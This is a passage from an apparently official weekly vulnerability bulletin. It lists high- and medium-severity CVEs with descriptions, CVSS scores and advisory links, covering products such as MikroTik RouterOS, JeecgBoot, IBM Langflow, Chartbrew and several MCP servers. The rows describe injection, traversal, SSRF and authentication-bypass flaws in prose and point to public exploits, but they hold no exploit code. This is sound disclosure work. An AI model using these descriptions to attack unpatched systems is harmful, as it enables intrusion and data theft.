https://plugins.trac.wordpress.org/browser/armember-membership/trunk/core/classes/class.arm_shortcodes.php#L434 https://plugins.trac.wordpress.org/browser/armember-membership/tags/4.0.60/core/classes/class.arm_shortcodes.php#L434 https://plugins.trac.wordpress.org/browser/armember-membership/trunk/core/classes/class.arm_shortcodes.php#L36 https://plugins.trac.wordpress.org/browser/armember-membership/tags/4.0.60/core/classes/class.arm_shortcodes.php#L36 |
| MikroTik--RouterOS | A vulnerability was identified in MikroTik RouterOS 6.49.8. This vulnerability affects the function ASN1_STRING_data in the library nova/lib/www/scep.p of the component SCEP Endpoint. The manipulation of the argument transactionID/messageType leads to out-of-bounds read. The attack may be initiated remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-02 | 7.3 | CVE-2026-7668 | VDB-360804 | MikroTik RouterOS SCEP Endpoint scep.p ASN1_STRING_data out-of-bounds VDB-360804 | CTI Indicators (IOB, IOC, IOA) Submit #798623 | MikroTik RouterOS 6.49.8 Out-of-Bounds Read https://github.com/ezio315/cve/issues/4 |
| Jinher--OA | A flaw has been found in Jinher OA 1.0. The affected element is an unknown function of the file /C6/JHSoft.Web.PlanSummarize/UserSel.aspx. This manipulation of the argument DeptIDList causes sql injection. The attack is possible to be carried out remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-02 | 7.3 | CVE-2026-7670 | VDB-360818 | Jinher OA UserSel.aspx sql injection VDB-360818 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #799506 | Jinhe OA V1.0 SQL Injection https://github.com/zzlln/cvecve/issues/1 |
| YunaiV--yudao-cloud | A security flaw has been discovered in YunaiV yudao-cloud up to 2026.01. This impacts the function getAccessToken of the file yudao-module-system-biz/src/main/java/io/github/ruoyi/common/oauth2/service/impl/OAuth2TokenServiceImpl.java. Performing a manipulation results in improper authentication. The attack can be initiated remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-03 | 7.3 | CVE-2026-7679 | VDB-360832 | YunaiV yudao-cloud OAuth2TokenServiceImpl.java getAccessToken improper authentication VDB-360832 | CTI Indicators (IOB, IOC, IOA) Submit #800866 | YunaiV yudao-cloud up to 2026.01 Authentication Bypass by Primary Weakness https://github.com/9str0IL/CVE/issues/1 |
| Acrel Electrical--ECEMS Enterprise Microgrid Energy Efficiency Management System | A flaw has been found in Acrel Electrical ECEMS Enterprise Microgrid Energy Efficiency Management System 1.3.0. The impacted element is an unknown function of the file /SubstationWEBV2/main/elecMaxMinAvgValue. Executing a manipulation of the argument fCircuitids can lead to sql injection. The attack can be launched remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-03 | 7.3 | CVE-2026-7694 | VDB-360863 | Acrel Electrical ECEMS Enterprise Microgrid Energy Efficiency Management System elecMaxMinAvgValue sql injection VDB-360863 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #803271 | Acrel Electric Co., Ltd. Enterprise Microgrid Energy Efficiency Management System (ECEMS) 1.3.0 SQL Injection https://ucn9h68n9289.feishu.cn/wiki/WZMewApmsiT3PMkCJfzcASEznOb |
| Acrel Electrical--EEMS Enterprise Power Operation and Maintenance Cloud Platform | A vulnerability has been found in Acrel Electrical EEMS Enterprise Power Operation and Maintenance Cloud Platform 1.3.0. This affects an unknown function of the file /SubstationWEBV2/main/elecMaxMinAvgValue. The manipulation of the argument fCircuitids leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-03 | 7.3 | CVE-2026-7695 | VDB-360864 | Acrel Electrical EEMS Enterprise Power Operation and Maintenance Cloud Platform elecMaxMinAvgValue sql injection VDB-360864 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #803275 | Acrel Electric Co., Ltd. EEMS Enterprise Power Operation and Maintenance Cloud Platform 1.3.0 SQL Injection https://ucn9h68n9289.feishu.cn/wiki/QoXfwTAOiiYw2OkO0vAc7b7SnGg |
| Tiandy--Easy7 Integrated Management Platform | A vulnerability was identified in Tiandy Easy7 Integrated Management Platform 7.17.0. Affected by this vulnerability is an unknown functionality of the file /Easy7/rest/systemInfo/updateDbBackupInfo. Such manipulation of the argument week leads to os command injection. The attack can be executed remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-03 | 7.3 | CVE-2026-7698 | VDB-360867 | Tiandy Easy7 Integrated Management Platform updateDbBackupInfo os command injection VDB-360867 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #804048 | Tiandy Technologies Co., Ltd. Tiandy-Easy7 7.17.0 OS Command Injection https://ucn9h68n9289.feishu.cn/wiki/Yslcw7QqWiRjUZkCcvkcJI62n2c |
| AV Stumpfl--Pixera Two Media Server | A flaw has been found in AV Stumpfl Pixera Two Media Server up to 25.2 R2. Impacted is an unknown function of the component Websocket API. This manipulation causes code injection. The attack can be initiated remotely. The exploit has been published and may be used. Upgrading to version 25.2 R3 is recommended to address this issue. Upgrading the affected component is advised. | 2026-05-03 | 7.3 | CVE-2026-7703 | VDB-360872 | AV Stumpfl Pixera Two Media Server Websocket API code injection VDB-360872 | CTI Indicators (IOB, IOC, TTP) Submit #805274 | AV Stumpfl Pixera Two Media Server < 25.2 R3 Remote Code Execution https://gist.github.com/TrebledJ/585a20525e45549f299d282233632608 https://help.pixera.one/changelogs-version-overviews/pixera-252-overview-changelog |
| YunaiV--yudao-cloud | A security flaw has been discovered in YunaiV yudao-cloud up to 3.8.0. This affects the function doFilterInternal of the file JwtAuthenticationTokenFilter.java of the component Ruoyi-Vue-Pro. Performing a manipulation of the argument mock-token results in improper authentication. Remote exploitation of the attack is possible. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-03 | 7.3 | CVE-2026-7710 | VDB-360886 | YunaiV yudao-cloud Ruoyi-Vue-Pro JwtAuthenticationTokenFilter.java doFilterInternal improper authentication VDB-360886 | CTI Indicators (IOB, IOC, IOA) Submit #806493 | YunaiV yudao-cloud yudao-cloud up to 2026.01 Authentication Bypass by Primary Weakness https://github.com/9str0IL/CVE/issues/5 |
| n/a--MindsDB | A weakness has been identified in MindsDB up to 26.01. This impacts the function exec of the file mindsdb/integrations/handlers/byom_handler/proc_wrapper.py of the component Engine Handler. Executing a manipulation can lead to unrestricted upload. The attack can be executed remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-03 | 7.3 | CVE-2026-7711 | VDB-360887 | MindsDB Engine proc_wrapper.py exec unrestricted upload VDB-360887 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #806822 | mindsdb <=26.01 Remote Code Execution https://github.com/nn0nkey/JD-Security-SHENYI-Team/blob/main/MindsDB_BYOM_RCE.md |
Medium Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| xenial--RSVG | librsvg2-bin 2.40.13 contains a buffer overflow vulnerability that allows local attackers to cause a denial of service by processing malformed SVG files. Attackers can supply crafted SVG input to the rsvg conversion tool to trigger a segmentation fault in the cairo image compositor. | 2026-04-29 | 6.2 | CVE-2018-25305 | ExploitDB-44491 VulnCheck Advisory: librsvg2-bin 2.40.13 Buffer Overflow via Malformed SVG |
| poppler-utils--PDFunite | PDFunite 0.41.0 contains a buffer overflow vulnerability that allows local attackers to crash the application by processing malformed PDF files during merge operations. Attackers can trigger a segmentation fault in the XRef::getEntry function within libpoppler by providing a specially crafted PDF file to the pdfunite utility. | 2026-04-29 | 6.2 | CVE-2018-25306 | ExploitDB-44490 Official Product Homepage Product Reference VulnCheck Advisory: PDFunite 0.41.0 Buffer Overflow via Malformed PDF |
| VideoFlow Ltd.--VideoFlow Digital Video Protection | VideoFlow Digital Video Protection DVP 2.10 contains an authenticated directory traversal vulnerability that allows authenticated attackers to disclose arbitrary files by injecting path traversal sequences in the ID parameter. Attackers can submit requests to downloadsys.pl, download_xml.pl, download.pl, downloadmib.pl, or downloadFile.pl with directory traversal payloads to read sensitive system files like /etc/passwd. | 2026-04-29 | 6.5 | CVE-2018-25311 | ExploitDB-44386 Vulnerability Advisory VulnCheck Advisory: VideoFlow Digital Video Protection DVP 10 Authenticated Directory Traversal 2.10 (X-Prototype-Version: 1.6.0.2) |
| LifeSize--ClearSea | LifeSize ClearSea 3.1.4 contains directory traversal vulnerabilities that allow authenticated attackers to download and upload arbitrary files by manipulating path parameters in the smartgui interface. Attackers can exploit the upload endpoint with directory traversal sequences to write files to arbitrary locations on the system, enabling remote code execution. | 2026-04-29 | 6.5 | CVE-2018-25312 | ExploitDB-44390 VulnCheck Advisory: LifeSize ClearSea 3.1.4 Directory Traversal Remote Code Execution |
| Sysgauge--SysGauge | SysGauge 4.5.18 contains a buffer overflow vulnerability in the proxy configuration handler that allows local attackers to cause a denial of service by supplying an oversized string. Attackers can inject a large payload through the Proxy Server Host Name field in the Options menu to crash the application. | 2026-04-29 | 6.2 | CVE-2018-25313 | ExploitDB-44372 VulnCheck Advisory: SysGauge 4.5.18 Local Denial of Service via Proxy Configuration |
| sebet--Go Fetch Jobs (for WP Job Manager) | Multiple plugins and/or themes for WordPress are vulnerable to Reflected Cross-Site Scripting via the url parameter in various versions due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2026-05-01 | 6.1 | CVE-2024-13362 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d694491c-c0f5-4418-805a-db792ea4f712?source=cve https://plugins.trac.wordpress.org/browser/tablepress/trunk/libraries/freemius/assets/js/pricing/freemius-pricing.js https://plugins.trac.wordpress.org/browser/widgets-on-pages/trunk/freemius/assets/js/pricing/freemius-pricing.js https://plugins.trac.wordpress.org/browser/menu-image/trunk/freemius/assets/js/pricing/freemius-pricing.js https://plugins.trac.wordpress.org/browser/simply-gallery-block/trunk/freemius/assets/js/pricing/freemius-pricing.js https://plugins.trac.wordpress.org/browser/foobox-image-lightbox/tags/2.7.33/freemius/assets/js/pricing/freemius-pricing.js https://plugins.trac.wordpress.org/browser/featured-images-for-rss-feeds/trunk/includes/freemius/assets/js/pricing/freemius-pricing.js https://plugins.trac.wordpress.org/browser/wpide/tags/3.5.0/dist/pricing/freemius-pricing.js https://plugins.trac.wordpress.org/browser/add-search-to-menu/trunk/includes/freemius/assets/js/pricing/freemius-pricing.js https://plugins.trac.wordpress.org/browser/master-addons/trunk/lib/freemius/assets/js/pricing/freemius-pricing.js https://plugins.trac.wordpress.org/browser/foogallery/tags/2.4.27/freemius/assets/js/pricing/freemius-pricing.js https://plugins.trac.wordpress.org/browser/ocean-extra/trunk/includes/freemius/assets/js/pricing/freemius-pricing.js https://plugins.trac.wordpress.org/browser/internal-links/trunk/vendor/freemius/wordpress-sdk/assets/js/pricing/freemius-pricing.js https://plugins.trac.wordpress.org/browser/interactive-geo-maps/tags/1.6.21/vendor/freemius/wordpress-sdk/assets/js/pricing/freemius-pricing.js https://plugins.trac.wordpress.org/browser/independent-analytics/trunk/freemius/assets/js/pricing/freemius-pricing.js https://plugins.trac.wordpress.org/browser/spotlight-social-photo-feeds/trunk/ui/freemius-pricing/freemius-pricing.js https://plugins.trac.wordpress.org/browser/woo-permalink-manager/tags/2.3.11/assets/admin/js/pricing-page/freemius-pricing.js https://plugins.trac.wordpress.org/browser/pdf-poster/trunk/freemius/assets/js/pricing/freemius-pricing.js https://plugins.trac.wordpress.org/browser/wp-meta-and-date-remover/tags/2.3.4/freemius/assets/js/pricing/freemius-pricing.js https://plugins.trac.wordpress.org/browser/unlimited-elements-for-elementor/trunk/provider/freemius/assets/js/pricing/freemius-pricing.js https://plugins.trac.wordpress.org/browser/shortcodes-ultimate/trunk/freemius/assets/js/pricing/freemius-pricing.js https://plugins.trac.wordpress.org/changeset/3235286/ https://plugins.trac.wordpress.org/changeset/3249130/ https://plugins.trac.wordpress.org/changeset/3229060/ |
| WSO2--WSO2 Identity Server | The authentication endpoint accepts user-supplied input without enforcing expected validation constraints, leading to a lack of proper output encoding. This allows for the injection of malicious JavaScript payloads, enabling reflected cross-site scripting. An attacker can leverage this vulnerability to redirect the user's browser to a malicious website, modify the user interface of the web page, retrieve information from the browser, or cause other harmful actions. However, due to the protection of session-related cookies with the httpOnly flag, session hijacking is not possible. | 2026-04-29 | 6.1 | CVE-2025-10503 | https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2026/WSO2-2025-4577/ |
| trustindex--Widgets for Social Photo Feed | The Widgets for Social Photo Feed plugin for WordPress is vulnerable to unauthorized access of data and modification of data due to a missing capability check on the '/trustindex_feed_hook_instagram/troubleshooting' and '/trustindex_feed_hook_instagram/submit-data' REST API endpoints in all versions up to, and including, 1.8. This makes it possible for unauthenticated attackers to access and update plugin settings. | 2026-05-02 | 6.5 | CVE-2025-14726 | https://www.wordfence.com/threat-intel/vulnerabilities/id/ab15fa8b-4072-435a-8a1c-ca6fd964a260?source=cve https://plugins.trac.wordpress.org/changeset/3513612/social-photo-feed-widget |
| IBM--Db2 | IBM Db2 11.5.0 through 11.5.9, and 12.1.0 through 12.1.3 for Linux, UNIX and Windows (includes DB2 Connect Server) could allow an authenticated user to cause a denial of service using a specially crafted SQL query due to improper allocation of system resources. | 2026-04-30 | 6.5 | CVE-2025-36122 | https://www.ibm.com/support/pages/node/7267642 |
| IBM--watsonx.data intelligence | IBM watsonx.data intelligence 5.2.0, 5.2.1, 5.3.0, 5.3.1 stores user credentials in plain text which can be read by a local user. | 2026-04-30 | 6.2 | CVE-2025-36335 | https://www.ibm.com/support/pages/node/7270923 |
| xlplugins--NextMove Lite Thank You Page for WooCommerce | The NextMove Lite - Thank You Page for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'xlwcty_current_date' shortcode in all versions up to, and including, 2.23.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-02 | 6.4 | CVE-2026-0703 | https://www.wordfence.com/threat-intel/vulnerabilities/id/a8eab201-04a5-43df-bb9b-2964c50a1833?source=cve https://plugins.trac.wordpress.org/browser/woo-thank-you-page-nextmove-lite/tags/2.23.0/merge-tags/xlwcty-shortcode-merge-tags.php#L79 https://plugins.trac.wordpress.org/browser/woo-thank-you-page-nextmove-lite/tags/2.23.0/merge-tags/xlwcty-shortcode-merge-tags.php#L87 https://plugins.trac.wordpress.org/changeset/3482613/ |
| Zyxel--DX3300-T0 firmware | A post-authentication command injection vulnerability in the EasyMesh-related APIs of Zyxel DX3300-T0 firmware versions through 5.50(ABVY.7.1)C0 could allow an authenticated, adjacent attacker with administrator privileges to execute OS commands on an affected device. | 2026-04-28 | 6.8 | CVE-2026-0711 | https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-command-injection-vulnerabilities-in-certain-4g-lte-5g-nr-cpe-dsl-ethernet-cpe-fiber-onts-and-wireless-extenders-04-28-2026 |
| IBM--Db2 | IBM Db2 11.5.0 through 11.5.9, and 12.1.0 through 12.1.4 for Linux, UNIX and Windows (includes Db2 Connect Server) could allow an authenticated user to cause a denial of service due to improper neutralization of special elements in data query logic. | 2026-04-30 | 6.5 | CVE-2026-1577 | https://www.ibm.com/support/pages/node/7269434 |
| Dell--Alienware Command Center (AWCC) | Dell Alienware Command Center (AWCC), versions prior to 6.13.8.0, contain an Execution with Unnecessary Privileges vulnerability in the AWCC. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Elevation of Privileges. | 2026-04-27 | 6.7 | CVE-2026-25908 | https://www.dell.com/support/kbdoc/en-us/000451018/dsa-2026-192-security-update-for-dell-alienware-command-center-6-x-for-multiple-vulnerabilities |
| wazuh--wazuh | Wazuh is a free and open source platform used for threat prevention, detection, and response. From version 4.0.0 to before version 4.14.4, Wazuh's server API brute-force protection for POST /security/user/authenticate can be bypassed by sending concurrent authentication requests. Although the configured threshold (max_login_attempts, default 50) is enforced correctly for sequential requests, a parallel burst allows significantly more failed login attempts to be processed before the IP block is applied. This enables an attacker to perform more password guesses than the configured policy intends (e.g., 100 attempts processed where 50 should be allowed). This issue has been patched in version 4.14.4. | 2026-04-29 | 6.5 | CVE-2026-26206 | https://github.com/wazuh/wazuh/security/advisories/GHSA-m2mr-xhhv-jx58 https://github.com/wazuh/wazuh/releases/tag/v4.14.4 |
| Dell--Dell/Alienware Purchased Apps | Dell/Alienware Purchased Apps, versions prior to 1.1.31.0, contain an Improper Link Resolution Before File Access ('Link Following') vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Arbitrary File Write | 2026-04-29 | 6.3 | CVE-2026-27105 | https://www.dell.com/support/kbdoc/en-us/000438321/dsa-2026-131-security-update-for-dell-alienware-purchased-apps-for-an-improper-link-resolution-before-file-access-vulnerability |
| Milesight--MS-Cxx63-PD | A command injection vulnerability exists in the web server of specific firmware versions of Milesight cameras. | 2026-04-27 | 6.8 | CVE-2026-32649 | https://www.cisa.gov/news-events/ics-advisories/icsa-26-113-03 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-113-03.json https://www.milesight.com/support/download/firmware |
| IBM--Langflow Desktop | IBM Langflow Desktop 1.0.0 through 1.8.4 IBM Langflow is vulnerable to server-side request forgery (SSRF). This may allow an authenticated attacker to send unauthorized requests from the system, potentially leading to network enumeration or facilitating other attacks. | 2026-04-30 | 6.5 | CVE-2026-3340 | https://www.ibm.com/support/pages/node/7271096 |
| IBM--Langflow Desktop | IBM Langflow Desktop <=1.8.4 Langflow could allow a remote attacker to traverse directories on the system. An attacker could send a specially crafted URL request containing "dot dot" sequences (/../) to view arbitrary files on the system. | 2026-04-30 | 6.5 | CVE-2026-3345 | https://www.ibm.com/support/pages/node/7271094 |
| IBM--Langflow Desktop | IBM Langflow Desktop 1.6.0 through 1.8.4 Lanflow is vulnerable to stored cross-site scripting. This vulnerability allows an authenticated user to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. | 2026-04-30 | 6.4 | CVE-2026-3346 | https://www.ibm.com/support/pages/node/7271095 |
| chartbrew--chartbrew | Chartbrew is an open-source web application that can connect directly to databases and APIs and use the data to create charts. In version 4.9.0, the endpoint POST /user/invited does not validate any invite token, authentication header, or session. Any unauthenticated attacker can call this endpoint directly to create a fully active account and receive a valid JWT - even when the instance has existing users and signupRestricted is enabled. This bypass is distinct from the normal registration endpoint (POST /user) which enforces signupRestricted and sets active: false pending verification. This issue has been patched in version 5.0.0. | 2026-04-30 | 6.5 | CVE-2026-35514 | https://github.com/chartbrew/chartbrew/security/advisories/GHSA-g47g-v5cp-j8hp https://github.com/chartbrew/chartbrew/releases/tag/v5.0.0 |
| n/a-- V2Board v1.7.4 | Cross-Site Scripting (XSS) in V2Board thru 1.7.4. The custom_html field in theme configuration is rendered using Blade unescaped output in public/theme/v2board/dashboard.blade.php. An admin can inject arbitrary JavaScript via the saveThemeConfig API. All site visitors execute the payload, enabling cookie theft, session hijacking, or phishing. | 2026-05-01 | 6.9 | CVE-2026-37503 | https://github.com/v2board/v2board https://gist.github.com/sgInnora/1330e1a82caa79906eec55eeff2c99b9 |
| redhat[.]com--gnutls | A flaw was found in gnutls. This vulnerability occurs because gnutls performs case-sensitive comparisons of `nameConstraints` labels, specifically for `dNSName` (DNS) or `rfc822Name` (email) constraints within `excludedSubtrees` or `permittedSubtrees`. A remote attacker can exploit this by crafting a leaf certificate with casing differences in the Subject Alternative Name (SAN), leading to a policy bypass where a certificate that should be rejected is instead accepted. This could result in unauthorized access or information disclosure. | 2026-04-30 | 6.5 | CVE-2026-3833 | RHSA-2026:13274 https://access.redhat.com/security/cve/CVE-2026-3833 RHBZ#2445763 https://gitlab.com/gnutls/gnutls/-/issues/1803 |
| chartbrew--chartbrew | Chartbrew is an open-source web application that can connect directly to databases and APIs and use the data to create charts. In version 4.9.0, Chartbrew exposes a legacy dashboard route that returns a project's report data to any authenticated member of the same team, even when that user does not have access to the specific project. The route bypasses project-level authorization and returns the raw project object. As a result, a low-privileged same-team user can read another project's dashboard data and recover the project's stored report password from the response. This issue has been patched in version 5.0.0. | 2026-04-30 | 6.5 | CVE-2026-40603 | https://github.com/chartbrew/chartbrew/security/advisories/GHSA-6qr3-g75h-xm3f https://github.com/chartbrew/chartbrew/releases/tag/v5.0.0 |
| nextlevelbuilder--ui-ux-pro-max-skill | A flaw has been found in nextlevelbuilder ui-ux-pro-max-skill up to 2.5.0. Affected by this vulnerability is the function _format_plugins of the file .claude/skills/ui-styling/scripts/tailwind_config_gen.py of the component Tailwind Config Generator. This manipulation causes code injection. The attack is possible to be carried out remotely. The exploit has been published and may be used. The project was informed of the problem early through a pull request but has not reacted yet. | 2026-05-01 | 6.3 | CVE-2026-7595 | VDB-360548 | nextlevelbuilder ui-ux-pro-max-skill Tailwind Config Generator tailwind_config_gen.py _format_plugins code injection VDB-360548 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #805509 | nextlevelbuilder ui-ux-pro-max-skill 2.5.0 Tailwind Config Generator Code Injection Leading to RCE https://github.com/nextlevelbuilder/ui-ux-pro-max-skill/issues/246 https://github.com/nextlevelbuilder/ui-ux-pro-max-skill/pull/275 https://github.com/nextlevelbuilder/ui-ux-pro-max-skill/ |
| mem0ai--mem0 | A vulnerability was found in mem0ai mem0 up to 1.0.11. This affects the function pickle.load/pickle.dump of the file mem0/vector_stores/faiss.py. Performing a manipulation results in deserialization. It is possible to initiate the attack remotely. The exploit has been made public and could be used. The patch is named 62dca096f9236010ca15fea9ba369ba740b86b7a. Applying a patch is the recommended action to fix this issue. | 2026-05-01 | 6.3 | CVE-2026-7597 | VDB-360550 | mem0ai mem0 faiss.py pickle.dump deserialization VDB-360550 | CTI Indicators (IOB, IOC, IOA) Submit #805562 | Mem0 <= v1.0.11 Unsafe Deserialization https://github.com/mem0ai/mem0/issues/3778 https://github.com/mem0ai/mem0/pull/4833 https://github.com/mem0ai/mem0/commit/62dca096f9236010ca15fea9ba369ba740b86b7a https://github.com/mem0ai/mem0/ |
| Dayoooun--hwpx-mcp | A vulnerability was detected in Dayoooun hwpx-mcp 0.2.0. This affects the function save_document/export_to_text/export_to_html of the file mcp-server/src/index.ts of the component MCP Interface. Performing a manipulation of the argument output_path results in path traversal. Remote exploitation of the attack is possible. The exploit is now public and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-01 | 6.3 | CVE-2026-7599 | VDB-360556 | Dayoooun hwpx-mcp MCP index.ts export_to_html path traversal VDB-360556 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #805608 | Dayoooun hwpx-mcp Commit 87850fd67f0488d79fcbf061a29938cae914a15d Path Traversal https://github.com/Dayoooun/hwpx-mcp/issues/3 https://github.com/BruceJqs/public_exp/issues/28 https://github.com/Dayoooun/hwpx-mcp/ |
| ArtMin96--yii2-mcp-server | A flaw has been found in ArtMin96 yii2-mcp-server 1.0.2. This impacts the function yii_command_help/yii_execute_command of the file src/index.ts of the component MCP Interface. Executing a manipulation can lead to os command injection. The attack can be executed remotely. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-02 | 6.3 | CVE-2026-7600 | VDB-360557 | ArtMin96 yii2-mcp-server MCP index.ts yii_execute_command os command injection VDB-360557 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #805613 | ArtMin96 yii2-mcp-server 1.0.2 Command Injection https://github.com/ArtMin96/yii2-mcp-server/issues/3 https://github.com/BruceJqs/public_exp/issues/29 https://github.com/ArtMin96/yii2-mcp-server/ |
| n/a--JeecgBoot | A vulnerability was found in JeecgBoot up to 3.9.1. Affected by this vulnerability is an unknown functionality of the file /sys/fillRule/edit of the component FillRuleUtil Component. The manipulation of the argument ruleClass results in improper authorization. The attack may be performed from remote. The exploit has been made public and could be used. You should upgrade the affected component. The vendor confirmed the issue and will provide a fix in the upcoming release. | 2026-05-02 | 6.3 | CVE-2026-7602 | VDB-360559 | JeecgBoot FillRuleUtil edit improper authorization VDB-360559 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #805706 | jeecgboot JeecgBoot <= v3.9.1 Remote Code Execution https://github.com/jeecgboot/JeecgBoot/issues/9552 https://github.com/jeecgboot/JeecgBoot/issues/9552#issuecomment-4251391314 https://github.com/jeecgboot/JeecgBoot/ |
| n/a--JeecgBoot | A vulnerability was determined in JeecgBoot up to 3.9.1. Affected by this issue is the function checkPathTraversalBatch of the file FileDownloadUtils.jav of the component LoadFile Endpoint. This manipulation of the argument files causes server-side request forgery. It is possible to initiate the attack remotely. The exploit has been publicly disclosed and may be utilized. The affected component should be upgraded. The vendor confirmed the issue and will provide a fix in the upcoming release. | 2026-05-02 | 6.3 | CVE-2026-7603 | VDB-360560 | JeecgBoot LoadFile Endpoint FileDownloadUtils.jav checkPathTraversalBatch server-side request forgery VDB-360560 | CTI Indicators (IOB, IOC, IOA) Submit #805707 | jeecgboot JeecgBoot <= v3.9.1 SSRF https://github.com/jeecgboot/JeecgBoot/issues/9553 https://github.com/jeecgboot/JeecgBoot/issues/9553#issuecomment-4251745014 https://github.com/jeecgboot/JeecgBoot/ |
| n/a--JeecgBoot | A vulnerability was identified in JeecgBoot up to 3.9.1. This affects the function OpenApiController.add/OpenApiController.call of the file OpenApiController.java of the component OpenApi Service. Such manipulation of the argument originUrl database leads to server-side request forgery. It is possible to launch the attack remotely. The exploit is publicly available and might be used. It is suggested to upgrade the affected component. The vendor confirmed the issue and will provide a fix in the upcoming release. | 2026-05-02 | 6.3 | CVE-2026-7604 | VDB-360561 | JeecgBoot OpenApi Service OpenApiController.java OpenApiController.call server-side request forgery VDB-360561 | CTI Indicators (IOB, IOC, IOA) Submit #805708 | jeecgboot JeecgBoot <= v3.9.1 SSRF https://github.com/jeecgboot/JeecgBoot/issues/9554 https://github.com/jeecgboot/JeecgBoot/issues/9554#issuecomment-4251574151 https://github.com/jeecgboot/JeecgBoot/ |
| n/a--JeecgBoot | A security flaw has been discovered in JeecgBoot up to 3.9.1. This vulnerability affects the function CommonController.uploadImgByHttp/HttpFileToMultipartFileUtil.httpFileToMultipartFile/HttpFileToMultipartFileUtil.downloadImageData of the file CommonController.java of the component uploadImgByHttpEndpoint. Performing a manipulation results in server-side request forgery. The attack can be initiated remotely. The exploit has been released to the public and may be used for attacks. Upgrading the affected component is recommended. The vendor confirmed the issue and will provide a fix in the upcoming release. | 2026-05-02 | 6.3 | CVE-2026-7605 | VDB-360562 | JeecgBoot uploadImgByHttpEndpoint CommonController.java HttpFileToMultipartFileUtil.downloadImageData server-side request forgery VDB-360562 | CTI Indicators (IOB, IOC, IOA) Submit #805709 | jeecgboot JeecgBoot <= v3.9.1 SSRF https://github.com/jeecgboot/JeecgBoot/issues/9555 https://github.com/jeecgboot/JeecgBoot/issues/9555#issuecomment-4251745271 https://github.com/jeecgboot/JeecgBoot/ |
| TRENDnet--TEW-821DAP | A flaw has been found in TRENDnet TEW-821DAP up to 1.12B01. The impacted element is the function tools_diagnostic of the file /tmp/diagnostic of the component Firmware Udpate. This manipulation causes os command injection. Remote exploitation of the attack is possible. The exploit has been published and may be used. The vendor explains: "That firmware version will only work on our hardware version v1.xR. We have already EOL that product 8 years ago and are no longer selling". This vulnerability only affects products that are no longer supported by the maintainer. | 2026-05-02 | 6.3 | CVE-2026-7609 | VDB-360566 | TRENDnet TEW-821DAP Firmware Udpate diagnostic tools_diagnostic os command injection VDB-360566 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #806216 | Trendnet TEW-821DAP v1.12B01 CWE-78 Improper Neutralization of Special Elements used in an O https://github.com/IOTRes/IOT_Firmware_Update/blob/main/Trendnet/TEW-821DAP_CI2.md |
| 8nite--metatrader-4-mcp | A security vulnerability has been detected in 8nite metatrader-4-mcp 1.0.0. This vulnerability affects the function CallToolRequestSchema of the file src/index.ts of the component sync_ea_from_file. Such manipulation of the argument ea_name leads to path traversal. The attack can be launched remotely. The exploit has been disclosed publicly and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-02 | 6.3 | CVE-2026-7627 | VDB-360573 | 8nite metatrader-4-mcp sync_ea_from_file index.ts CallToolRequestSchema path traversal VDB-360573 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #806286 | 8nite metatrader-4-mcp 1.0.0 Path Traversal https://github.com/8nite/metatrader-4-mcp/issues/1 https://github.com/8nite/metatrader-4-mcp/ |
| crazyrabbitLTC--mcp-code-review-server | A vulnerability was detected in crazyrabbitLTC mcp-code-review-server up to 0.1.0. This issue affects the function executeRepomix of the file src/repomix.ts of the component RepoMix Command Handler. Performing a manipulation results in command injection. The attack may be initiated remotely. The exploit is now public and may be used. The project was informed of the problem early through a pull request but has not reacted yet. | 2026-05-02 | 6.3 | CVE-2026-7628 | VDB-360574 | crazyrabbitLTC mcp-code-review-server RepoMix repomix.ts executeRepomix command injection VDB-360574 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #806469 | crazyrabbitLTC mcp-code-review-server <=0.1.0 Command Injection https://github.com/crazyrabbitLTC/mcp-code-review-server/issues/4 https://github.com/crazyrabbitLTC/mcp-code-review-server/pull/5 https://github.com/user-attachments/files/26018245/mcp-code-review-server_bug.pdf https://github.com/crazyrabbitLTC/mcp-code-review-server/ |
